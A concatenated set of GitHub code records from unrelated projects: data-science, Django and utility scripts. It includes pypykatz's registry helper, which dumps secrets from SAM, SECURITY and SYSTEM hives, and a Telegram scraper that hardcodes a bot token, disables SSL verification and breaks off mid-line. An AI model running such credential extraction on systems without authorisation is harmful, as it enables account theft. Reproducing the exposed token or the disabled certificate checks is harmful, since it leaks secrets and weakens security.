pyspark.sql.types import *\n\nfrom exercises.catalog.catalog import file_to_frame\n\ndef clean(frame: DataFrame) -> DataFrame:\n # First, get the majority of columns “fixed”, i.e. their datatypes improved.\n df2 = (frame\n .withColumnRenamed('Code', 'Airport_Code')\n .withColumnRenamed('Description', 'Airport_Description')\n )\n return df2\n\nif __name__ == \"__main__\":\n target_dir = Path(__file__).parents[1] / \"target\"\n target_dir.mkdir(exist_ok=True)\n spark = SparkSession.builder.getOrCreate()\n frame = file_to_frame(\"airports\",spark)\n\n # frame.show(15)\n\n cleaned_frame=clean(frame)\n cleaned_frame.printSchema()\n cleaned_frame.write.mode(\"overwrite\").parquet(str(target_dir / \"cleaned_airports\"))","repo_name":"kdebaerdemaeker/pyspark_training","sub_path":"exercises/cleansers/clean_airports.py","file_name":"clean_airports.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13919433221","text":"import argparse\n\nimport cv2\nfrom mmdeploy_runtime import Restorer\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='show how to use sdk python api')\n parser.add_argument('device_name', help='name of device, cuda or cpu')\n parser.add_argument(\n 'model_path', help='path of SDK model dumped by model converter')\n parser.add_argument('image_path', help='path of an image')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n img = cv2.imread(args.image_path)\n\n restorer = Restorer(\n model_path=args.model_path, device_name=args.device_name, device_id=0)\n result = restorer(img)\n\n # convert to BGR\n result = result[..., ::-1]\n cv2.imwrite('output_restorer.bmp', result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"open-mmlab/mmdeploy","sub_path":"demo/python/image_restorer.py","file_name":"image_restorer.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"24929089497","text":"#Esta la cree yo!\nfrom django.contrib import admin\nfrom django.urls import path\nfrom Aplicaciones.Abogados.views import *\n\nurlpatterns = [\n path('',index, name = 'LogInPage'),\n path('listaContrato/',gestionContrato),\n path('crearusuario/',crearUsuario),\n path('registro/',paginaRegistro, name = 'RegisterPage'),\n path('miinicio/',paginaLogeo),\n\n]","repo_name":"Fckworld/abogadosLex","sub_path":"AbogadosLex/Aplicaciones/Abogados/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34137497435","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\nfrom sample.models import Book, Edition\n\nUser = get_user_model()\n\n\nclass CloneSignalsTestCase(TestCase):\n REPLICA_DB_ALIAS = \"replica\"\n databases = {\n \"default\",\n \"replica\",\n }\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create(username=\"user\")\n\n def test_signals(self):\n name = \"New Book\"\n first_published_at = timezone.datetime(\n 1970, 1, 1, tzinfo=timezone.get_default_timezone()\n )\n book = Book.objects.create(\n name=name,\n created_by=self.user,\n slug=slugify(name),\n published_at=first_published_at,\n )\n self.assertEqual(book.published_at, first_published_at)\n edition = Edition.objects.create(seq=1, book=book)\n cloned_edition = edition.make_clone()\n self.assertEqual(cloned_edition.seq, 2)\n book.refresh_from_db()\n self.assertNotEqual(book.published_at, first_published_at)\n","repo_name":"tj-django/django-clone","sub_path":"model_clone/tests/test_clone_signals.py","file_name":"test_clone_signals.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"53"} +{"seq_id":"31747739156","text":"from time import sleep\r\nfrom winsound import Beep\r\nHour=0\r\nMin=0\r\nSec=0\r\nprint(\"\\n\")\r\ngreet=input(\"You will be asked to enter a timer by selecting hours, minutes, and seconds in order. Press enter to continue. \")\r\nwhile Hour==0:\r\n h=input(\"Select Hours: \")\r\n if h==0:\r\n break\r\n if h.isdigit():\r\n Hour=int(h)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nwhile Min==0:\r\n m=input(\"Select Minutes: \")\r\n if m==0:\r\n break\r\n if m.isdigit():\r\n Min=int(m)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nwhile Sec==0:\r\n s=input(\"Select Seconds: \")\r\n if s==0:\r\n break\r\n if s.isdigit():\r\n Sec=int(s)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nprint(Hour,\":\",Min,\":\",Sec)\r\nsleep(Hour*3600+Min*60+Sec)\r\nprint(\"Time's up\\n\")\r\nBeep(1000,500)","repo_name":"lancedeal/Pet-Projects","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26913879092","text":"import urllib.request\nimport schedule\nimport time\n\ndef download_file(url, filename):\n urllib.request.urlretrieve(url, filename)\n\ndef job():\n url = 'https://webservices.mirea.ru/upload/iblock/603/t0wpe4tzyecbhx1wse7mpuv4ovhdnlr8/IKTST_4_k_osen_23.xlsx'\n filename = 'file.zip'\n download_file(url, filename)\n\n# Расписание выполнения задачи каждый день в 12:00\nschedule.every().day.at(\"23:59\").do(job)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)","repo_name":"PolyanskayaP/downloader","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31370219177","text":"\"\"\"\n Loads keras mnist dataset, calculates all between-picture distances and saves one dictionary per picture with the distances to all other pictures.\n To get the dictionary for a specific picture, hash the data of the picture with\n \n ```\n m = hashlib.sha3_256()\n m.update(img.data)\n key = m.hexdigest()\n ```\n\n and load the corresponding file with \n ```\n lookup = np.load(path.join(filepath, f\"{key}.npz\"), allow_pickle=True)[\"lookup\"].item(0)\n ```\n\n To look up a specific picture in the loaded dictionary use the binary digest as key, i.e.,\n\n ```\n m = hashlib.sha3_256()\n m.update(img.data)\n key = m.digest()\n lookup[key]\n ```\n\n Don't reuse m!\n\n\"\"\"\n#%%\nfrom datetime import datetime\nfrom hashlib import sha3_256 as hashfunc\nfrom os import getcwd, makedirs, path, sched_getaffinity\nimport cv2\n\nimport numpy as np\nfrom tensorflow.keras.datasets.mnist import load_data\nfrom tqdm.contrib.concurrent import process_map\n\nglobal X, batch_size, len_X, filepath\n\n#%%\nsize_subsample = 100000\n(x_train, _), (x_test, _) = load_data()\nX = np.concatenate((x_train, x_test))\nX = X.reshape((len(X), 28 * 28))[:size_subsample]\n\nmags = []\nfor img in X:\n dft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\n dft_shift = np.fft.fftshift(dft)\n magnitude_spectrum_1 = 20*np.log(1+cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\n mags.append(magnitude_spectrum_1.reshape((28 * 28)))\n\n#%%\n#num_fake_data = 10\n#X = np.tile(np.arange(num_fake_data).reshape(num_fake_data, 1), (1, num_fake_data))\n\n#%%\ndef mat_mul(start_idx: int) -> None:\n\n # repeat batch to work on, i.e., [1,1,1,2,2,2]\n X_first = np.repeat(mags[start_idx : start_idx + batch_size], len_X, axis=0)\n # tile all images, i.e, [1,2,3,1,2,3]\n X_second = np.tile(mags, (batch_size, 1))\n # distance calculation, change if needed\n X_dist = np.sqrt(np.sum(np.square(X_first - X_second), axis=1))\n X_dist = X_dist.astype(np.float16)\n\n # loop over all pictures in the batch\n # lookup range helpful, when the last batch is not full\n lookup_range = batch_size if start_idx + batch_size < len_X else len_X - start_idx\n\n X_first.flags.writeable = False\n X_second.flags.writeable = False\n\n for idx in range(lookup_range):\n m = hashfunc()\n m.update(X_first[idx * len_X].data)\n main_hash = m.hexdigest()\n\n tmp = {}\n # loop over all pictures\n for jdx in range(len_X):\n m = hashfunc()\n m.update(X_second[idx * len_X + jdx].data)\n tmp_hash = m.digest()\n tmp[tmp_hash] = X_dist[idx * len_X + jdx]\n\n np.savez_compressed(path.join(filepath, f\"{main_hash}.npz\"), lookup=tmp)\n\n del X_first, X_second, X_dist, tmp, main_hash, tmp_hash\n\n\n#%%\nbatch_size = 2\nnum_processes = len(sched_getaffinity(0))\nlen_X = len(X)\nall_idx = np.arange(0, len_X, batch_size)\n\n#filepath = path.join(getcwd(), \"test_dicts\")\nfilepath = path.join(\"/home/ubuntu/hannah_distances\", \"partial_dicts\")\nmakedirs(filepath, exist_ok=True)\n\nstart = datetime.now()\n\n# the same as using multiprocessing, but shows progress bar\n# with multiprocessing.Pool(num_processes) as p:\n# p.map(mat_mul, all_idx)\nprocess_map(mat_mul, all_idx, max_workers=num_processes)\n\nstop = datetime.now()\n\nprint(f\"Overall calculation took {stop - start}\", flush=True)\n\n\n# # %%\n# lookup = np.load(\n# path.join(\n# filepath,\n# \"d609e40c13512f409e8075f9da4a72aef6822ad14815b601eac3fc339db2a00a.npz\",\n# ),\n# allow_pickle=True,\n# )[\"lookup\"].item(0)","repo_name":"SAP-samples/security-research-identifiability-in-dpdl","sub_path":"dpa/projects/mnist/heuristics/distances_Fourier.py","file_name":"distances_Fourier.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30647297709","text":"# -*- coding: utf-8 -*-\nfrom __init__ import DATA_DIR, SETTINGS\nfrom ma_jakarta.scripts.data_preprocessing import admin_border\nfrom os import path, mkdir\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nfrom shapely.geometry import Polygon, mapping, LineString, shape\nimport sys\nimport logging\nfrom shapely.ops import unary_union, polygonize\nfrom rasterstats import zonal_stats\nfrom area import area\n\n\ndef add_capacity_data(scenario, amenity_type, range_value):\n \"\"\"Adds health capacity attributes to isochrones\"\"\"\n iso_layer = None\n\n # load isochrone data and sort by amenity type and range value\n if scenario == 'normal':\n iso_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['isochrones'][scenario]))\n elif scenario == 'flooded':\n iso_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['isochrones']['pre_' + scenario]))\n iso_hosp = iso_layer.loc[iso_layer.amenity == amenity_type].copy()\n iso_hosp_value = iso_hosp.loc[iso_hosp.value == range_value].copy()\n\n # load health amenity data and sort by amenity type\n hs_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['amenities'][scenario]))\n # osm data id = id_1; hot data id = osm_id\n id_name = ['id_1' if 'id_1' in hs_layer else 'osm_id'][0]\n hs_hosp = hs_layer.loc[hs_layer.amenity == amenity_type].copy()\n hs_hosp = hs_hosp.rename({id_name: \"amenity_id\"}, axis=1)\n\n # merge data\n data_merged = pd.merge(hs_hosp, iso_hosp_value, on='amenity_id')\n data_merged = data_merged.rename({\"geometry_y\": \"geometry\"}, axis=1)\n\n if 'cap_int' in data_merged.columns:\n data_selected = data_merged[['geometry', 'amenity_id', 'cap_int']]\n else:\n print(\"Information: ma_jakarta.scripts.analysis.supply_demand analysis.add_capacity_data: no capacity data present.\\nIf available needs to be present in field cap_int. Assiging 0 to cap_int.\")\n data_selected = data_merged[['geometry', 'amenity_id']]\n data_selected.insert(2, 'cap_int', 0, True)\n\n return data_selected\n\n\ndef create_boundaries(input_layer):\n \"\"\"Generates overlay layer containing all possible polygons of overlapping isochrones.\n It considers only the isochrone boundaries, not the number of overlapping polygons\"\"\"\n\n # generate linestring layer containing the exterior coordinates of the isochrone boundaries\n boundaries = [LineString(list(shape(geom).exterior.coords)) for geom in input_layer['geometry']]\n # dissolve linestring connections to result in single linestring segments\n unioned_data = unary_union(boundaries)\n # generate polygons using linestring segments as boundary -> isochrone fragments\n polygonized_data = [geom for geom in polygonize(unioned_data)]\n\n layer_list = []\n for i, pol in enumerate(polygonized_data):\n layer_list.append(pd.DataFrame.from_dict({'geometry': mapping(pol)['coordinates']}))\n\n concat_df = pd.concat([layer for layer in layer_list]).reset_index()\n concat_df['geometry'] = [Polygon(g) for g in concat_df['geometry']]\n\n result_geodf = gpd.GeoDataFrame(concat_df, geometry='geometry')\n\n return result_geodf\n\n\ndef intersect_overlap(scenario, iso_capacities, iso_boundaries):\n \"\"\"Amount of overlapping isochrone fragments result in specific available health capacity within each area\"\"\"\n geom_list = []\n counter = 0\n\n # for each polygon respectively isochrone fragment\n for overlay_idx in range(len(iso_boundaries)):\n\n original_idx_overlapping = 0\n cap_int_value = 0 # counter to sum up cumulative health capacity for overlapping areas\n overlay_idx_geom = iso_boundaries.geometry[overlay_idx]\n\n # for each isochrone\n for original_idx in range(len(iso_capacities)):\n\n original_idx_geom = iso_capacities.geometry[original_idx]\n\n if overlay_idx_geom.intersects(original_idx_geom):\n intersected_geom = overlay_idx_geom.intersection(original_idx_geom)\n\n if intersected_geom.geom_type == 'Polygon':\n\n # sum up bed capacity per geometry\n cap_int_value += iso_capacities.cap_int[original_idx]\n counter += 1\n original_idx_overlapping = original_idx_overlapping + 1\n\n if len(geom_list) == 0:\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n else:\n # drop geometries with an area size smaller than 1m²\n if area(mapping(intersected_geom)) > 0.000009039:\n # drop overlapping rows\n if intersected_geom.almost_equals(geom_list[-1][3]):\n del geom_list[-1]\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n else:\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n\n df = pd.DataFrame(geom_list, columns=['counter', 'overlap', 'cap_int', 'geometry'])\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n if scenario != 'normal':\n # remove flooded areas\n flood_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['flood']['preprocessed']))\n result_geodf = gpd.overlay(result_geodf, flood_layer, how='symmetric_difference')\n\n # drop entries with missing and empty geometries\n result_geodf = result_geodf[~(result_geodf['geometry'].is_empty | result_geodf['geometry'].isna())]\n\n return result_geodf\n\n\ndef drop_similar_entries(poly_layer=None):\n \"\"\"Removes duplicate geometries\"\"\"\n poly_list = []\n\n # select still overlapping geometries\n for poly_idx in range(len(poly_layer[:-1])):\n # select if population count and area size is almost the same\n if poly_layer['pop'][poly_idx] == poly_layer['pop'][poly_idx + 1] and \\\n round(poly_layer['area'][poly_idx], 7) == round(poly_layer['area'][poly_idx + 1], 7):\n poly_list.append(poly_layer['counter'][poly_idx])\n\n # drop rows from df\n df = poly_layer[~poly_layer['counter'].isin(poly_list)]\n\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef calculate_fragment_values(pop_raster, poly_layer=None, add_columns=False):\n \"\"\"Calculates population sum per isochrone.\"\"\"\n pop_data = []\n\n for poly_idx, poly_cap, poly_geom in zip(poly_layer['counter'], poly_layer['cap_int'], poly_layer['geometry']):\n feature = gpd.GeoSeries([poly_geom]).to_json()\n pop_stats = zonal_stats(feature, pop_raster, stats=['sum']) # calculate population for given area\n poly_area = area(mapping(poly_geom)) / 1e+6 # in kilometer\n pop_data.append([poly_idx, poly_cap, pop_stats[0]['sum'], poly_area, poly_geom])\n\n df = pd.DataFrame(pop_data, columns=['counter', 'cap_int', 'pop', 'area', 'geometry'])\n df['pop'].fillna(0, inplace=True)\n\n if add_columns is True:\n df['cap_pop'] = (df['cap_int']/df['pop']) * 100000\n df['pop_area'] = df['pop']/df['area'] # population density\n df['cap_dens'] = df['cap_int'] / df['pop_area']\n\n df = df.replace([np.inf, -np.inf], np.nan)\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef normal_flooded_union(normal_layer, scenario_layer):\n \"\"\"Applies union to receive all possible geometries\"\"\"\n\n # drop entries with missing and empty geometries and spply buffer around each geometry\n normal_cleaned = normal_layer[~(normal_layer['geometry'].is_empty | normal_layer['geometry'].isna())]\n normal_cleaned = normal_cleaned[['counter', 'cap_int', 'geometry']]\n normal_cleaned.geometry = normal_cleaned.geometry.buffer(0.000001).copy()\n\n # drop entries with missing and empty geometries\n scenario_cleaned = scenario_layer[~(scenario_layer['geometry'].is_empty | scenario_layer['geometry'].isna())]\n normal_cleaned = normal_cleaned[['counter', 'cap_int', 'geometry']]\n normal_cleaned.geometry = normal_cleaned.geometry.buffer(0.000001).copy()\n\n # apply union overlay\n result_geodf = gpd.overlay(normal_cleaned, scenario_cleaned, how='union')\n\n return result_geodf\n\n\ndef calculate_column_change(pop_raster, poly_layer):\n \"\"\"Calculates flood impact per isochrone for each column.\"\"\"\n pop_data = []\n poly_layer = poly_layer[['counter_1', 'cap_int_1', 'counter_2', 'cap_int_2', 'geometry']]\n\n for poly_idx_n, poly_cap_n, poly_idx_2, poly_cap_2, poly_geom in zip(poly_layer['counter_1'],\n poly_layer['cap_int_1'],\n poly_layer['counter_2'],\n poly_layer['cap_int_2'],\n poly_layer['geometry']):\n feature = gpd.GeoSeries([poly_geom]).to_json()\n # drop geometries with an area size smaller than 1m²\n if area(mapping(poly_geom)) > 0.000009039:\n # calculate population for given area\n pop_stats = zonal_stats(feature, pop_raster, stats=['sum'])\n poly_area = area(mapping(poly_geom)) / 1e+6 # in kilometer\n pop_data.append([poly_idx_n, poly_cap_n, poly_idx_2, poly_cap_2, pop_stats[0]['sum'], poly_area, poly_geom])\n\n df = pd.DataFrame(pop_data, columns=['counter_1', 'cap_int_1', 'counter_2', 'cap_int_2', 'pop', 'area', 'geometry'])\n df.dropna(subset=['pop'])\n\n df['pop_area'] = df['pop'] / df['area'] # population density\n df['cap_pop'] = (df['cap_int_1'] / df['pop']) * 100000\n df['cap_dens'] = df['cap_int_1'] / df['pop_area']\n df['cap_dens_2'] = df['cap_int_2'] / df['pop_area']\n df['cap_dens_d'] = df['cap_dens_2'] - df['cap_dens']\n\n df = df.replace([np.inf, -np.inf], np.nan)\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef stats(access_result_geodf, column_name, percentile_value):\n \"\"\"Calculates percentile value; Useful for data interpretation and visualisation \"\"\"\n df_np = access_result_geodf[column_name].to_numpy()\n\n print(str(percentile_value), ' percentile:', np.nanpercentile(df_np, int(percentile_value)))\n print('Std.:', np.std(df_np))\n print('Std., ignoring NaNs:', np.nanstd(df_np))\n print('Variance, ignoring NaNs:', np.nanvar(df_np))\n print('Mean:', np.mean(df_np))\n print('Mean, ignoring NaNs:', np.nanmean(df_np))\n\n\nif __name__ == '__main__':\n\n scenario_name = None\n analysis_part = None\n amenity_type_input = 'hospital'\n time_range = 300 # 5 minutes\n pop_layer = path.join(DATA_DIR, SETTINGS['population']['extract'])\n iso_boundaries_layer = None\n column_name_input = None\n percentile_value_input = None\n\n try:\n analysis_part = str(sys.argv[1])\n except IndexError:\n logging.error('Please provide a analysis_part, e.g., analysis or stats.')\n sys.exit(1)\n print(analysis_part)\n if analysis_part == 'analysis':\n\n try:\n scenario_name = str(sys.argv[2])\n except IndexError:\n logging.error('Please provide one scenario name, e.g., normal or flooded.')\n sys.exit(1)\n\n try:\n amenity_type_input = str(sys.argv[3])\n time_range = int(sys.argv[4])\n except IndexError:\n pass\n\n if not path.exists(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'])):\n mkdir(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results']))\n print('Directory', path.join(DATA_DIR, SETTINGS['supply_demand']['path_results']), 'created.')\n\n # add health data to isochrones\n iso_cap_layer = add_capacity_data(scenario_name, amenity_type_input, time_range)\n # create overlay layer\n iso_boundaries_layer = create_boundaries(iso_cap_layer)\n # calculate values of overlapping areas\n cum_overlap_layer = intersect_overlap(scenario_name, iso_cap_layer, iso_boundaries_layer)\n\n # add additional information like population amount\n area_lyr = calculate_fragment_values(pop_layer, cum_overlap_layer, False)\n cleaned_lyr = drop_similar_entries(area_lyr)\n supply_demand_geodf = calculate_fragment_values(pop_layer, cleaned_lyr, True)\n\n # save data\n supply_demand_geodf.to_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand'][scenario_name]), driver='ESRI Shapefile')\n print(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'], SETTINGS['supply_demand'][scenario_name]),\n 'saved')\n\n if scenario_name == 'flooded':\n\n supply_demand_normal = gpd.read_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['normal']))\n city_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['city_border']['preprocessed']))\n\n # calculate flood impact\n union_result = normal_flooded_union(supply_demand_normal, supply_demand_geodf)\n impact_result = calculate_column_change(pop_layer, union_result)\n # calculate city difference to receive only data within the city\n impact_result_city = admin_border.border_intersect(city_layer, impact_result)\n\n # save impact data\n impact_result_city.to_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['impact']), driver='ESRI Shapefile')\n print(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'], SETTINGS['supply_demand']['impact']),\n 'saved')\n\n elif analysis_part == 'stats':\n print(sys.argv[2])\n try:\n column_name_input = str(sys.argv[2])\n except IndexError:\n logging.error('Please provide a valid column name of the processed file:',\n path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']))\n sys.exit(1)\n\n try:\n percentile_value_input = sys.argv[3]\n except IndexError:\n logging.error('Please provide a percentile between 0 and 100.')\n sys.exit(1)\n\n # load processed impact file\n impact_geodf = gpd.read_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']), driver='ESRI Shapefile')\n\n # check if column exists in input file\n if column_name_input not in impact_geodf:\n print('Please provide a valid column name of the processed file:',\n path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']))\n sys.exit()\n\n # run percentile function\n stats(impact_geodf, column_name_input, percentile_value_input)\n","repo_name":"GIScience/Jakarta_Thesis_Klipper","sub_path":"ma_jakarta/scripts/analysis/supply_demand.py","file_name":"supply_demand.py","file_ext":"py","file_size_in_byte":15232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37179779785","text":"import numpy as np\n\ndef bot_d2h_dx2(x, s):\n\t\"\"\"\n\tHessian of the measurement function in BOT-demo.\n\n\tCopyright (C) 2007 Jouni Hartikainen\n\t\n\tThis software is distributed under the GNU General Public \n\tLicence (version 2 or later); please refer to the file \n\tLicence.txt, included with the software, for details.\n\t\"\"\"\n\n\t# Space for Hessians. Note that we need a Hessian for\n\t# each dimension in the measurement space, that is we need\n\t# a Hessian for each sensor in this case. \n\n\ts_ = s.shape[1]\n\tx_ = x.shape[0] \n\n\tdY = np.zeros((s_,x_,x_))\n\t\n\t# Loop through sensors.\n\tfor i in range(s_):\n\t\t# Derivative twice wrt. x\n\t\tdx2 = -2*(x[0]-s[0,i]) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\t# Derivative twice wrt. y \n\t\tdy2 = -2*(x[1]-s[1,i]) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\t# Derivative wrt. x and y\n\t\tdxdy = ((x[1]-s[1,i])**2-(x[0]-s[0,i])**2) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\tdh = np.array([[dx2, dxdy, 0, 0],\n\t\t\t\t\t [dxdy, dy2, 0, 0],\n\t\t\t\t\t [0, 0, 0, 0],\n\t\t\t\t\t [0, 0, 0, 0]])\n\t\tdY[i] = dh\n\treturn dY","repo_name":"sursu/Bayesian-Filtering","sub_path":"EKFUKF_Py/demo/bot_demo/bot_d2h_dx2.py","file_name":"bot_d2h_dx2.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"3299431648","text":"import datetime\nimport time\nfrom pathlib import Path\nfrom pickle import dump, load\n\nimport numpy as np\nimport pymaid\nfrom requests.exceptions import ChunkedEncodingError\nfrom src.data import load_maggot_graph\nfrom src.pymaid import start_instance\nimport matplotlib.pyplot as plt\n\nout_path = Path(\"maggot_models/experiments/pull_neurons/outs\")\n\n\nt0 = time.time()\nstart_instance()\n\nmg = load_maggot_graph()\nnodes = mg.nodes\nids = [int(i) for i in nodes.index[:100]]\n\nbatch_size = 100\nmax_tries = 5\nn_batches = int(np.floor(len(ids) / batch_size))\nif len(ids) % n_batches > 0:\n n_batches += 1\nprint(f\"Batch size: {batch_size}\")\nprint(f\"Number of batches: {n_batches}\")\nprint(f\"Number of neurons: {len(ids)}\")\nprint(f\"Batch product: {n_batches * batch_size}\\n\")\n\ni = 0\ncurrtime = time.time()\nnl = pymaid.get_neuron(\n ids[i * batch_size : (i + 1) * batch_size], with_connectors=False\n)\nprint(f\"{time.time() - currtime:.3f} seconds elapsed for batch {i}.\")\nfor i in range(1, n_batches):\n currtime = time.time()\n n_tries = 0\n success = False\n while not success and n_tries < max_tries:\n try:\n nl += pymaid.get_neuron(\n ids[i * batch_size : (i + 1) * batch_size], with_connectors=False\n )\n success = True\n except ChunkedEncodingError:\n print(f\"Failed pull on batch {i}, trying again...\")\n n_tries += 1\n print(f\"{time.time() - currtime:.3f} seconds elapsed for batch {i}.\")\n\nprint(\"\\nPulled all neurons.\\b\")\n\n\nprint(\"Pickling...\")\ncurrtime = time.time()\n\nwith open(out_path / \"neurons.pickle\", \"wb\") as f:\n dump(nl, f)\nprint(f\"{time.time() - currtime:.3f} seconds elapsed.\")\n\nelapsed = time.time() - t0\ndelta = datetime.timedelta(seconds=elapsed)\nprint(\"----\")\nprint(f\"Script took {delta}\")\nprint(f\"Completed at {datetime.datetime.now()}\")\nprint(\"----\")\n\nwith open(out_path / \"neurons.pickle\", \"rb\") as f:\n nl = load(f)\n\nnl.plot2d()\nplt.show()","repo_name":"neurodata/maggot_models","sub_path":"experiments/pull_neurons/pull_neurons.py","file_name":"pull_neurons.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20123923602","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport json\nimport traceback\n\nfrom pypykatz import logger\nfrom pypykatz.commons.common import UniversalEncoder\n\n\n\nclass RegistryCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['registry']\n\t\tself.keywords = ['registry']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tlive_group = live_parser.add_parser('registry', help='Get all secrets from registry')\n\t\tlive_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')\n\t\tlive_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')\n\t\t\n\t\tgroup = parser.add_parser('registry', help='Get secrets from registry files')\n\t\tgroup.add_argument('system', help='path to the SYSTEM registry hive')\n\t\tgroup.add_argument('--sam', help='path to the SAM registry hive')\n\t\tgroup.add_argument('--security', help='path to the SECURITY registry hive')\n\t\tgroup.add_argument('--software', help='path to the SOFTWARE registry hive')\n\t\tgroup.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')\n\t\tgroup.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')\n\t\t\n\tdef execute(self, args):\n\t\tif len(self.keywords) > 0 and args.command in self.keywords:\n\t\t\tself.run(args)\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tself.run_live(args)\n\t\t\t\n\tdef process_results(self, results, args):\n\t\tif args.outfile:\n\t\t\tresults.to_file(args.outfile, args.json)\n\t\telse:\n\t\t\tif args.json:\n\t\t\t\tprint(json.dumps(results.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))\n\t\t\telse:\n\t\t\t\tprint(str(results))\n\t\t\t\t\n\tdef run_live(self, args):\n\t\tfrom pypykatz.registry.live_parser import LiveRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = LiveRegistry.go_live()\n\t\texcept Exception as e:\n\t\t\ttraceback.print_exc()\n\t\t\tlogger.debug('Failed to obtain registry secrets via direct registry reading method. Reason: %s' % str(e))\n\t\t\ttry:\n\t\t\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\t\t\tlr = OffineRegistry.from_live_system()\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed to obtain registry secrets via filedump method')\n\t\t\n\t\tif lr is not None:\n\t\t\tself.process_results(lr, args)\n\t\telse:\n\t\t\tprint('Registry parsing failed!')\n\t\t\t\n\tdef run(self, args):\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tpo = OffineRegistry.from_files(args.system, args.sam, args.security, args.software)\n\t\t\n\t\tself.process_results(po, args)\n\t\t","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/registry/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"43263429985","text":"import bs4\nfrom bs4 import BeautifulSoup as soup\nfrom urllib.request import Request, urlopen\nimport time\nimport ssl\nimport requests\n\nTOKEN = \"6280442518:AAGO2RrGxgetLZGeB_mVOOzHN4keoc_bvQM\"\nchat_id = \"-1001820093494\"\n\nurl = \"https://www.hastor.com.sg/course/res/real-estate-salesperson-res-course/\"\nssl._create_default_https_context = ssl._create_unverified_context\nreq = Request(url,headers={'User-Agent': 'Mozilla/5.0'})\npage_html = 